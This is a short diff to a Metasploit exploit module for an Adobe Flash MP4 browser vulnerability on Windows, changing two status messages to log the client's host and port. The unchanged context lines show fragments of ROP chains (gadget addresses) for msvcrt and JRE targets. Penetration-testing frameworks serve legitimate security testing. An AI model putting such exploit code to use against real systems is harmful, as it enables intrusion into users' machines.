diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index ed05b425e7..2ecd352420 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt - print_status("Using msvcrt ROP") + print_status("#{cli.peerhost}:#{cli.peerport} Using msvcrt ROP") rop = [ 0x77c4e392, # POP EAX # RETN @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote ].pack("V*") when :jre - print_status("Using JRE ROP") + print_status("#{cli.peerhost}:#{cli.peerport} Using JRE ROP") rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN